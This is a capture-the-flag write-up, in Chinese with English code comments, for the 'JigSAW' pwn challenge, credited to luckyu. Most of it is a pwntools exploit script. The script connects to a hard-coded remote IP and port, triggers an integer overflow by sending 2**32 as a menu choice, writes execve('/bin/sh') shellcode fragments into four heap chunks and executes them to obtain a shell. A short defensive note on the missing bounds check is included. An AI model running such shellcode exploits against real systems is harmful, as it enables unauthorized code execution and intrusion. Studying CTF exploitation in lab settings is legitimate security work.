解题思路
通过整型溢出使堆区变为可执行，然后执行写入堆上的 shellcode，获取 shell。
exp
来自luckyu师傅的exp
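#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Exploit script for the JigSAW challenge (credited to luckyu).

Root cause, as stated by the writeup: an integer overflow on the numeric
menu "Choice" input makes the heap executable; shellcode fragments are then
written into four heap chunks (menu option 2) and executed via menu option 4.

Defender's view: the fix is a bounds check on the numeric menu input (the
value sent below is 2**32, i.e. one past the range of an unsigned 32-bit
integer) and never letting user-controlled input reach code that changes
the protection bits of the heap.

Changes against the original script:
  * the original spawned a local ./JigSAW process and then immediately
    rebound ``p`` to the remote connection, leaving the local process
    orphaned — the target is now chosen explicitly by ``REMOTE``;
  * ``libc = ELF("./libc.so")`` was never used and forced the file to
    exist, so it was dropped.
"""
from pwn import *

context.log_level = 'debug'
context.arch = "amd64"

# Select exactly one target so no unused process is left running.
REMOTE = True
if REMOTE:
    p = remote("47.104.71.220", 10273)
else:
    p = process('./JigSAW')  # e.g. env={"LD_PRELOAD": "./libc.so.6"}


def add(idx):
    """Menu option 1: allocate the chunk at slot ``idx``."""
    p.sendlineafter("Choice :", "1")
    p.sendlineafter("Index? :", str(idx))


def show(idx):
    """Menu option 5: print the chunk at slot ``idx`` (unused by exp())."""
    p.sendlineafter("Choice :", "5")
    p.sendlineafter("Index? :", str(idx))


def edit(idx, content):
    """Menu option 2: write raw ``content`` (bytes) into slot ``idx``.

    ``sendafter`` (not ``sendlineafter``) is used on purpose: a trailing
    newline would be appended to the shellcode bytes otherwise.
    """
    p.sendlineafter("Choice :", "2")
    p.sendlineafter("Index? :", str(idx))
    p.sendafter("iNput:", content)


def free(idx):
    """Menu option 3: release the chunk at slot ``idx`` (unused by exp())."""
    p.sendlineafter("Choice :", "3")
    p.sendlineafter("Index? :", str(idx))


def test(idx):
    """Menu option 4: make the program run the contents of slot ``idx``."""
    p.sendlineafter("Choice :", "4")
    p.sendlineafter("Index? :", str(idx))


def exp():
    """Drive the full interaction and hand the session over interactively."""
    # The payload is split into four fragments, one per chunk. Every fragment
    # but the last ends with ``add rsp, 0x20/0x28; push rsp``; presumably this
    # relies on the distance between adjacent chunks so that execution flows
    # from one fragment into the next — TODO confirm against the binary's
    # chunk layout, nothing below verifies it.
    shellcode1 = asm("mov rsp, rdx\nadd rsp, 0x20\npush rsp")
    # 0x68732f6e69622f is "/bin/sh\0" in little-endian byte order.
    shellcode2 = asm("mov rax, 0x68732f6e69622f\nadd rsp, 0x20\npush rsp")
    # Put the string on the stack: rdi -> "/bin/sh", rsi (argv) = 0.
    shellcode3 = asm("push rax\nmov rdi, rsp\nxor rsi, rsi\nadd rsp, 0x28\npush rsp")
    # rdx (envp) = 0, rax = 59 -> execve.
    shellcode4 = asm("xor rdx, rdx\nmov rax, 59\nsyscall\n")
    # Sanity check kept from the original: the fragment must fit one chunk
    # (the chunk size itself is not visible here).
    print(len(shellcode1))

    p.sendlineafter("Name:", "111")
    # 2**32 as the menu choice: the out-of-range value the writeup credits
    # with making the heap executable (the exact in-binary effect is not
    # visible from this script).
    p.sendlineafter("Choice:", str(0x100000000))

    for slot in range(4):
        add(slot)
    for slot, fragment in enumerate((shellcode1, shellcode2, shellcode3, shellcode4)):
        edit(slot, fragment)

    test(0)
    p.interactive()


if __name__ == '__main__':
    exp()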